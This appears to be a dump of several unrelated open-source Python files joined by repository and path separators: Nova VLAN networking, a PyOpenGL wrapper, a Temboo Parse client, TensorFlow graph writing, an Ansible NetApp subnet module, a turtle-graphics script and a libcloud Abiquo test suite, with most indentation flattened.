network['dhcp_server'] = self._get_dhcp_ip(context, network)
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
def _get_network_by_id(self, context, network_id):
return NetworkManager._get_network_by_id(self, context.elevated(),
network_id)
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = super(FlatDHCPManager, self)._get_network_dict(network)
# get flat dhcp specific fields
if self.SHOULD_CREATE_BRIDGE:
network_dict['should_create_bridge'] = self.SHOULD_CREATE_BRIDGE
if network.get('bridge_interface'):
network_dict['bridge_interface'] = network['bridge_interface']
if network.get('multi_host'):
network_dict['multi_host'] = network['multi_host']
return network_dict
class VlanManager(RPCAllocateFixedIP, FloatingIP, NetworkManager):
"""Vlan network with dhcp.
VlanManager is the most complicated. It will create a host-managed
vlan for each project. Each project gets its own subnet. The networks
and associated subnets are created with nova-manage using a command like:
nova-manage network create 10.0.0.0/8 3 16. This will create 3 networks
of 16 addresses from the beginning of the 10.0.0.0 range.
A dhcp server is run for each subnet, so each project will have its own.
For this mode to be useful, each project will need a vpn to access the
instances in its subnet.
"""
SHOULD_CREATE_BRIDGE = True
SHOULD_CREATE_VLAN = True
DHCP = True
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
self.l3driver.initialize()
NetworkManager.init_host(self)
self.init_host_floating_ips()
def allocate_fixed_ip(self, context, instance_id, network, **kwargs):
"""Gets a fixed ip from the pool."""
instance = self.db.instance_get(context, instance_id)
if kwargs.get('vpn', None):
address = network['vpn_private_address']
self.db.fixed_ip_associate(context,
address,
instance['uuid'],
network['id'],
reserved=True)
else:
address = kwargs.get('address', None)
if address:
address = self.db.fixed_ip_associate(context, address,
instance['uuid'],
network['id'])
else:
address = self.db.fixed_ip_associate_pool(context,
network['id'],
instance['uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance_id)
vif = self.db.virtual_interface_get_by_instance_and_network(
context, instance['uuid'], network['id'])
values = {'allocated': True,
'virtual_interface_id': vif['id']}
self.db.fixed_ip_update(context, address, values)
self._setup_network_on_host(context, network)
return address
@wrap_check_policy
def add_network_to_project(self, context, project_id):
"""Force adds another network to a project."""
self.db.network_associate(context, project_id, force=True)
def _get_networks_for_instance(self, context, instance_id, project_id,
requested_networks=None):
"""Determine which networks an instance should connect to."""
# get networks associated with project
if requested_networks is not None and len(requested_networks) != 0:
network_uuids = [uuid for (uuid, fixed_ip) in requested_networks]
networks = self.db.network_get_all_by_uuids(context,
network_uuids,
project_id)
else:
networks = self.db.project_get_networks(context, project_id)
return networks
def create_networks(self, context, **kwargs):
"""Create networks based on parameters."""
# Check that num_networks + vlan_start is not > 4094, fixes lp708025
if kwargs['num_networks'] + kwargs['vlan_start'] > 4094:
raise ValueError(_('The sum between the number of networks and'
' the vlan start cannot be greater'
' than 4094'))
# check that num networks and network size fits in fixed_net
fixed_net = netaddr.IPNetwork(kwargs['cidr'])
if len(fixed_net) < kwargs['num_networks'] * kwargs['network_size']:
raise ValueError(_('The network range is not big enough to fit '
'%(num_networks)s. Network size is %(network_size)s') %
kwargs)
return NetworkManager.create_networks(
self, context, vpn=True, **kwargs)
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
if not network['vpn_public_address']:
net = {}
address = FLAGS.vpn_ip
net['vpn_public_address'] = address
network = self.db.network_update(context, network['id'], net)
else:
address = network['vpn_public_address']
network['dhcp_server'] = self._get_dhcp_ip(context, network)
self.l3driver.initialize_gateway(network)
# NOTE(vish): only ensure this forward if the address hasn't been set
# manually.
if address == FLAGS.vpn_ip and hasattr(self.driver,
"ensure_vpn_forward"):
self.l3driver.add_vpn(FLAGS.vpn_ip,
network['vpn_public_port'],
network['vpn_private_address'])
if not FLAGS.fake_network:
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
if(FLAGS.use_ipv6):
self.driver.update_ra(context, dev, network)
gateway = utils.get_my_linklocal(dev)
self.db.network_update(context, network['id'],
{'gateway_v6': gateway})
def _teardown_network_on_host(self, context, network):
if not FLAGS.fake_network:
network['dhcp_server'] = self._get_dhcp_ip(context, network)
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
def _get_networks_by_uuids(self, context, network_uuids):
return self.db.network_get_all_by_uuids(context, network_uuids,
context.project_id)
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = super(VlanManager, self)._get_network_dict(network)
# get vlan specific network fields
if self.SHOULD_CREATE_BRIDGE:
network_dict['should_create_bridge'] = self.SHOULD_CREATE_BRIDGE
if self.SHOULD_CREATE_VLAN:
network_dict['should_create_vlan'] = self.SHOULD_CREATE_VLAN
for k in ['vlan', 'bridge_interface', 'multi_host']:
if network.get(k):
network_dict[k] = network[k]
return network_dict
@property
def _bottom_reserved_ips(self):
"""Number of reserved ips at the bottom of the range."""
return super(VlanManager, self)._bottom_reserved_ips + 1 # vpn server
@property
def _top_reserved_ips(self):
"""Number of reserved ips at the top of the range."""
parent_reserved = super(VlanManager, self)._top_reserved_ips
return parent_reserved + FLAGS.cnt_vpn_clients
|
kenshay/ImageScript | refs/heads/master | ProgramData/SystemFiles/Python/Lib/site-packages/OpenGL/GLES2/NV/shadow_samplers_array.py | 8 | '''OpenGL extension NV.shadow_samplers_array
This module customises the behaviour of the
OpenGL.raw.GLES2.NV.shadow_samplers_array to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/NV/shadow_samplers_array.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.shadow_samplers_array import *
from OpenGL.raw.GLES2.NV.shadow_samplers_array import _EXTENSION_NAME
def glInitShadowSamplersArrayNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
willprice/arduino-sphere-project | refs/heads/master | scripts/example_direction_finder/temboo/Library/Parse/Users/LinkExistingUser.py | 5 | # -*- coding: utf-8 -*-
###############################################################################
#
# LinkExistingUser
# Allows your application to link an existing user with a service like Facebook or Twitter.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class LinkExistingUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the LinkExistingUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(LinkExistingUser, self).__init__(temboo_session, '/Library/Parse/Users/LinkExistingUser')
def new_input_set(self):
return LinkExistingUserInputSet()
def _make_result_set(self, result, path):
return LinkExistingUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return LinkExistingUserChoreographyExecution(session, exec_id, path)
class LinkExistingUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the LinkExistingUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AuthData(self, value):
"""
Set the value of the AuthData input for this Choreo. ((required, json) A JSON string containing the authentication data of the user you want to link with another service. See documentation for more formatting details.)
"""
super(LinkExistingUserInputSet, self)._set_input('AuthData', value)
def set_ApplicationID(self, value):
"""
Set the value of the ApplicationID input for this Choreo. ((required, string) The Application ID provided by Parse.)
"""
super(LinkExistingUserInputSet, self)._set_input('ApplicationID', value)
def set_ObjectID(self, value):
"""
Set the value of the ObjectID input for this Choreo. ((required, string) The ID of the user that is being linked to another service.)
"""
super(LinkExistingUserInputSet, self)._set_input('ObjectID', value)
def set_RESTAPIKey(self, value):
"""
Set the value of the RESTAPIKey input for this Choreo. ((required, string) The REST API Key provided by Parse.)
"""
super(LinkExistingUserInputSet, self)._set_input('RESTAPIKey', value)
def set_SessionToken(self, value):
"""
Set the value of the SessionToken input for this Choreo. ((required, string) A valid Session Token. Note that Session Tokens can be retrieved by the Login and SignUp Choreos.)
"""
super(LinkExistingUserInputSet, self)._set_input('SessionToken', value)
class LinkExistingUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the LinkExistingUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Parse.)
"""
return self._output.get('Response', None)
class LinkExistingUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return LinkExistingUserResultSet(response, path)
|
whn09/tensorflow | refs/heads/master | tensorflow/python/framework/graph_io.py | 62 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for reading/writing graphs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
def write_graph(graph_or_graph_def, logdir, name, as_text=True):
"""Writes a graph proto to a file.
The graph is written as a binary proto unless `as_text` is `True`.
```python
v = tf.Variable(0, name='my_variable')
sess = tf.Session()
tf.train.write_graph(sess.graph_def, '/tmp/my-model', 'train.pbtxt')
```
or
```python
v = tf.Variable(0, name='my_variable')
sess = tf.Session()
tf.train.write_graph(sess.graph, '/tmp/my-model', 'train.pbtxt')
```
Args:
graph_or_graph_def: A `Graph` or a `GraphDef` protocol buffer.
logdir: Directory where to write the graph. This can refer to remote
filesystems, such as Google Cloud Storage (GCS).
name: Filename for the graph.
as_text: If `True`, writes the graph as an ASCII proto.
Returns:
The path of the output proto file.
"""
if isinstance(graph_or_graph_def, ops.Graph):
graph_def = graph_or_graph_def.as_graph_def()
else:
graph_def = graph_or_graph_def
# gcs does not have the concept of directory at the moment.
if not file_io.file_exists(logdir) and not logdir.startswith('gs:'):
file_io.recursive_create_dir(logdir)
path = os.path.join(logdir, name)
if as_text:
file_io.atomic_write_string_to_file(path, str(graph_def))
else:
file_io.atomic_write_string_to_file(path, graph_def.SerializeToString())
return path
|
shsingh/ansible | refs/heads/devel | lib/ansible/modules/storage/netapp/na_ontap_net_subnet.py | 20 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = """
module: na_ontap_net_subnet
short_description: NetApp ONTAP Create, delete, modify network subnets.
extends_documentation_fragment:
- netapp.na_ontap
version_added: '2.8'
author: Storage Engineering (@Albinpopote) <[email protected]>
description:
- Create, modify, destroy the network subnet
options:
state:
description:
- Whether the specified network interface group should exist or not.
choices: ['present', 'absent']
default: present
broadcast_domain:
description:
- Specify the required broadcast_domain name for the subnet.
- A broadcast domain can not be modified after the subnet has been created
required: true
name:
description:
- Specify the subnet name.
required: true
from_name:
description:
- Name of the subnet to be renamed
gateway:
description:
- Specify the gateway for the default route of the subnet.
ipspace:
description:
- Specify the ipspace for the subnet.
- The default value for this parameter is the default IPspace, named 'Default'.
ip_ranges:
description:
- Specify the list of IP address ranges associated with the subnet.
subnet:
description:
- Specify the subnet (ip and mask).
required: true
"""
EXAMPLES = """
- name: create subnet
na_ontap_net_subnet:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
subnet: 10.10.10.0/24
name: subnet-adm
ip_ranges: [ '10.10.10.30-10.10.10.40', '10.10.10.51' ]
gateway: 10.10.10.254
ipspace: Default
broadcast_domain: Default
- name: delete subnet
na_ontap_net_subnet:
state: absent
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
name: subnet-adm
ipspace: Default
- name: rename subnet
na_ontap_net_subnet:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
name: subnet-adm-new
from_name: subnet-adm
ipspace: Default
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapSubnet(object):
"""
Create, Modifies and Destroys a subnet
"""
def __init__(self):
"""
Initialize the ONTAP Subnet class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present', 'absent'], default='present'),
name=dict(required=True, type='str'),
from_name=dict(required=False, type='str'),
broadcast_domain=dict(required=False, type='str'),
gateway=dict(required=False, type='str'),
            ip_ranges=dict(required=False, type='list'),
ipspace=dict(required=False, type='str'),
subnet=dict(required=False, type='str')
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
return
def get_subnet(self, name=None):
"""
Return details about the subnet
:param:
name : Name of the subnet
:return: Details about the subnet. None if not found.
:rtype: dict
"""
if name is None:
name = self.parameters.get('name')
subnet_iter = netapp_utils.zapi.NaElement('net-subnet-get-iter')
subnet_info = netapp_utils.zapi.NaElement('net-subnet-info')
subnet_info.add_new_child('subnet-name', name)
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(subnet_info)
subnet_iter.add_child_elem(query)
result = self.server.invoke_successfully(subnet_iter, True)
return_value = None
# check if query returns the expected subnet
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) == 1:
subnet_attributes = result.get_child_by_name('attributes-list').get_child_by_name('net-subnet-info')
broadcast_domain = subnet_attributes.get_child_content('broadcast-domain')
gateway = subnet_attributes.get_child_content('gateway')
ipspace = subnet_attributes.get_child_content('ipspace')
subnet = subnet_attributes.get_child_content('subnet')
name = subnet_attributes.get_child_content('subnet-name')
ip_ranges = []
range_obj = subnet_attributes.get_child_by_name('ip-ranges').get_children()
for elem in range_obj:
ip_ranges.append(elem.get_content())
return_value = {
'name': name,
'broadcast_domain': broadcast_domain,
'gateway': gateway,
'ip_ranges': ip_ranges,
'ipspace': ipspace,
'subnet': subnet
}
return return_value
def create_subnet(self):
"""
Creates a new subnet
"""
options = {'subnet-name': self.parameters.get('name'),
'broadcast-domain': self.parameters.get('broadcast_domain'),
'subnet': self.parameters.get('subnet')}
subnet_create = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-create', **options)
if self.parameters.get('gateway'):
subnet_create.add_new_child('gateway', self.parameters.get('gateway'))
if self.parameters.get('ip_ranges'):
subnet_ips = netapp_utils.zapi.NaElement('ip-ranges')
subnet_create.add_child_elem(subnet_ips)
for ip_range in self.parameters.get('ip_ranges'):
subnet_ips.add_new_child('ip-range', ip_range)
if self.parameters.get('ipspace'):
subnet_create.add_new_child('ipspace', self.parameters.get('ipspace'))
try:
self.server.invoke_successfully(subnet_create, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error creating subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def delete_subnet(self):
"""
Deletes a subnet
"""
subnet_delete = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-destroy', **{'subnet-name': self.parameters.get('name')})
try:
self.server.invoke_successfully(subnet_delete, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error deleting subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def modify_subnet(self):
"""
Modifies a subnet
"""
options = {'subnet-name': self.parameters.get('name')}
subnet_modify = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-modify', **options)
if self.parameters.get('gateway'):
subnet_modify.add_new_child('gateway', self.parameters.get('gateway'))
if self.parameters.get('ip_ranges'):
subnet_ips = netapp_utils.zapi.NaElement('ip-ranges')
subnet_modify.add_child_elem(subnet_ips)
for ip_range in self.parameters.get('ip_ranges'):
subnet_ips.add_new_child('ip-range', ip_range)
if self.parameters.get('ipspace'):
subnet_modify.add_new_child('ipspace', self.parameters.get('ipspace'))
if self.parameters.get('subnet'):
subnet_modify.add_new_child('subnet', self.parameters.get('subnet'))
try:
self.server.invoke_successfully(subnet_modify, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def rename_subnet(self):
"""
TODO
"""
options = {'subnet-name': self.parameters.get('from_name'),
'new-name': self.parameters.get('name')}
subnet_rename = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-rename', **options)
if self.parameters.get('ipspace'):
subnet_rename.add_new_child('ipspace', self.parameters.get('ipspace'))
try:
self.server.invoke_successfully(subnet_rename, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error renaming subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def apply(self):
'''Apply action to subnet'''
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_net_subnet", cserver)
current = self.get_subnet()
cd_action, rename = None, None
if self.parameters.get('from_name'):
rename = self.na_helper.is_rename_action(self.get_subnet(self.parameters.get('from_name')), current)
if rename is False:
self.module.fail_json(msg="Error renaming: subnet %s does not exist" %
self.parameters.get('from_name'))
else:
cd_action = self.na_helper.get_cd_action(current, self.parameters)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
for attribute in modify:
if attribute in ['broadcast_domain']:
self.module.fail_json(msg='Error modifying subnet %s: cannot modify broadcast_domain parameter.' % self.parameters.get('name'))
if self.na_helper.changed:
if self.module.check_mode:
pass
else:
if rename:
self.rename_subnet()
                # If rename is True, cd_action is None but modify could be True
if cd_action == 'create':
for attribute in ['subnet', 'broadcast_domain']:
if not self.parameters.get(attribute):
self.module.fail_json(msg='Error - missing required arguments: %s.' % attribute)
self.create_subnet()
elif cd_action == 'delete':
self.delete_subnet()
elif modify:
self.modify_subnet()
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""
    Creates the NetApp ONTAP Net Subnet object and runs the correct play task
"""
subnet_obj = NetAppOntapSubnet()
subnet_obj.apply()
if __name__ == '__main__':
main()
|
povellesto/blobygames | refs/heads/master | Blob Rage App/random/makehacks.py | 1 | import random
import turtle
moveforward = ("Move forward")
turnleft = ("Turn Left")
movebackward = ("Move Backward")
turnright = ("Turn Right")
square = ("square")
circle = ("circle")
penUp = ("pen up")
penDown = ("pen down")
goto = ("go to")
house = ("house")
Instructions = ("Intructions")
def Instuctions():
print("")
print("Welcome To My Make Hacks Project!")
print("To make your turtle move forward, type moveforward")
print("To make your turtle move backward, type movebackward")
print("To make your turtle move left, type turnleft")
print("To make your turtle move right, type turnright")
print("")
def window():
turtle.right(35)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
Instuctions()
for i in range(1000):
Input = input("Enter a command ")
    if Input == moveforward:
        ask2 = input("How many Pixels? ")
        turtle.forward(int(ask2))
    if Input == turnleft:
        ask3 = input("How many degrees? ")
        turtle.left(int(ask3))
    if Input == turnright:
        ask8 = input("How many degrees? ")
        turtle.right(int(ask8))
    if Input == movebackward:
        turtle.left(180)
        ask4 = input("How many pixels would you like to go backward ")
        turtle.forward(int(ask4))
    if Input == Instructions:
        Instuctions()
if Input == square:
size= input("How big do you want the square to be? ")
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
if Input == circle:
ask5 = input("How big do you want the diameter to be? ")
turtle.circle(ask5)
if Input == penUp:
turtle.penup()
if Input == penDown:
turtle.pendown()
if Input == goto:
ask6 = input("x coordinates? ")
ask7 = input("y coordinates? ")
        turtle.goto(int(ask6), int(ask7))
if Input == house:
size= input("How big do you want the square to be? ")
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(180)
turtle.forward(size)
turtle.right(45)
turtle.forward(size-20)
turtle.right(101)
turtle.forward(size-18)
turtle.penup()
turtle.goto((size/2)/2,size/2)
turtle.pendown()
window()
|
Hybrid-Cloud/badam | refs/heads/master | patches_tool/aws_patch/aws_deps/libcloud/test/compute/test_abiquo.py | 1 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abiquo Test Suite
"""
import unittest
import sys
try:
from lxml import etree as ET
except ImportError:
from xml.etree import ElementTree as ET
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.abiquo import AbiquoNodeDriver
from libcloud.common.abiquo import ForbiddenError, get_href
from libcloud.common.types import InvalidCredsError, LibcloudError
from libcloud.compute.base import NodeLocation, NodeImage
from libcloud.test.compute import TestCaseMixin
from libcloud.test import MockHttpTestCase
from libcloud.test.file_fixtures import ComputeFileFixtures
class AbiquoNodeDriverTest(unittest.TestCase, TestCaseMixin):
"""
Abiquo Node Driver test suite
"""
def setUp(self):
"""
Set up the driver with the main user
"""
AbiquoNodeDriver.connectionCls.conn_classes = (AbiquoMockHttp, None)
self.driver = AbiquoNodeDriver('son', 'goku',
'http://dummy.host.com/api')
def test_unauthorized_controlled(self):
"""
Test the Unauthorized Exception is Controlled.
Test, through the 'login' method, that a '401 Unauthorized'
        raises an 'InvalidCredsError' instead of the 'MalformedUrlException'
"""
self.assertRaises(InvalidCredsError, AbiquoNodeDriver, 'son',
'goten', 'http://dummy.host.com/api')
def test_forbidden_controlled(self):
"""
Test the Forbidden Exception is Controlled.
Test, through the 'list_images' method, that a '403 Forbidden'
        raises a 'ForbiddenError' instead of the 'MalformedUrlException'
"""
AbiquoNodeDriver.connectionCls.conn_classes = (AbiquoMockHttp, None)
conn = AbiquoNodeDriver('son', 'gohan', 'http://dummy.host.com/api')
self.assertRaises(ForbiddenError, conn.list_images)
def test_handle_other_errors_such_as_not_found(self):
"""
Test common 'logical' exceptions are controlled.
        Test that common exceptions (normally 404-Not Found and 409-Conflict)
        that return an XMLResponse with the explanation of the errors are
controlled.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
self.assertRaises(LibcloudError, self.driver.list_images)
def test_ex_create_and_delete_empty_group(self):
"""
Test the creation and deletion of an empty group.
"""
group = self.driver.ex_create_group('libcloud_test_group')
group.destroy()
def test_create_node_no_image_raise_exception(self):
"""
Test 'create_node' without image.
Test the 'create_node' function without 'image' parameter raises
an Exception
"""
self.assertRaises(LibcloudError, self.driver.create_node)
def test_list_locations_response(self):
if not self.should_list_locations:
return None
locations = self.driver.list_locations()
self.assertTrue(isinstance(locations, list))
def test_create_node_specify_location(self):
"""
Test you can create a node specifying the location.
"""
image = self.driver.list_images()[0]
location = self.driver.list_locations()[0]
self.driver.create_node(image=image, location=location)
def test_create_node_specify_wrong_location(self):
"""
Test you can not create a node with wrong location.
"""
image = self.driver.list_images()[0]
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_wrong_image(self):
"""
Test image compatibility.
        Some locations can only handle a group of images, not all of them.
Test you can not create a node with incompatible image-location.
"""
# Create fake NodeImage
image = NodeImage(3234, 'dummy-image', self.driver)
location = self.driver.list_locations()[0]
# With this image, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_group_name(self):
"""
Test 'create_node' into a concrete group.
"""
image = self.driver.list_images()[0]
self.driver.create_node(image=image, group_name='new_group_name')
def test_create_group_location_does_not_exist(self):
"""
        Test 'ex_create_group' with a nonexistent location.
        Defines a 'fake' location and tries to create a group in it.
"""
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
# With this location, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.ex_create_group,
name='new_group_name',
location=location)
def test_destroy_node_response(self):
"""
'destroy_node' basic test.
Override the destroy to return a different node available
to be undeployed. (by default it returns an already undeployed node,
for test creation).
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_destroy_node_response_failed(self):
"""
'destroy_node' asynchronous error.
Test that the driver handles correctly when, for some reason,
the 'destroy' job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertFalse(ret)
def test_destroy_node_allocation_state(self):
"""
Test the 'destroy_node' invalid state.
Try to destroy a node when the node is not running.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
# Override the destroy to return a different node available to be
# undeployed
node = self.driver.list_nodes()[0]
# The mock class with the user:password 've:geta' returns a node that
# is in 'ALLOCATION' state and hence, the 'destroy_node' method should
# raise a LibcloudError
self.assertRaises(LibcloudError, self.driver.destroy_node, node)
def test_destroy_not_deployed_group(self):
"""
Test 'ex_destroy_group' when group is not deployed.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertTrue(group.destroy())
def test_destroy_deployed_group(self):
"""
Test 'ex_destroy_group' when there are machines running.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertTrue(group.destroy())
def test_destroy_deployed_group_failed(self):
"""
Test 'ex_destroy_group' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertFalse(group.destroy())
def test_destroy_group_invalid_state(self):
"""
Test 'ex_destroy_group' invalid state.
Test the Driver raises an exception when the group is in
invalid temporal state.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertRaises(LibcloudError, group.destroy)
def test_run_node(self):
"""
Test 'ex_run_node' feature.
"""
node = self.driver.list_nodes()[0]
# Node is by default in NodeState.TERMINATED and AbiquoState ==
# 'NOT_ALLOCATED'
# so it is available to be runned
self.driver.ex_run_node(node)
def test_run_node_invalid_state(self):
"""
Test 'ex_run_node' invalid state.
        Test the Driver raises an exception when trying to run a
        node that is in an invalid state to run.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is by default in AbiquoState = 'ON' for user 'go:trunks'
        # so it is not available to be run
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_run_node_failed(self):
"""
Test 'ex_run_node' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('ten', 'shin',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is in the correct state, but it fails because of the
# async task and it raises the error.
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_get_href(self):
xml = '''
<datacenter>
<link href="http://10.60.12.7:80/api/admin/datacenters/2"
type="application/vnd.abiquo.datacenter+xml" rel="edit1"/>
<link href="http://10.60.12.7:80/ponies/bar/foo/api/admin/datacenters/3"
type="application/vnd.abiquo.datacenter+xml" rel="edit2"/>
<link href="http://vdcbridge.interoute.com:80/jclouds/apiouds/api/admin/enterprises/1234"
type="application/vnd.abiquo.datacenter+xml" rel="edit3"/>
</datacenter>
'''
elem = ET.XML(xml)
href = get_href(element=elem, rel='edit1')
self.assertEqual(href, '/admin/datacenters/2')
href = get_href(element=elem, rel='edit2')
self.assertEqual(href, '/admin/datacenters/3')
href = get_href(element=elem, rel='edit3')
self.assertEqual(href, '/admin/enterprises/1234')
class AbiquoMockHttp(MockHttpTestCase):
"""
    Mock the functionality of the remote Abiquo API.
"""
fixtures = ComputeFileFixtures('abiquo')
fixture_tag = 'default'
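    # The mock keys off the basic-auth credentials used by the tests above:
    # 'son:goku' is the default valid user, 'son:goten' triggers 401,
    # 'son:gohan' triggers 403, 'go:trunks' returns deployed nodes and
    # not-found errors, 've:geta' returns resources in transient states, and
    # 'muten:roshi' / 'ten:shin' make the asynchronous tasks fail.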
def _api_login(self, method, url, body, headers):
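        # 'c29uOmdvdGVu' is the base64 encoding of 'son:goten', the invalid
        # credentials used by test_unauthorized_controlled.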
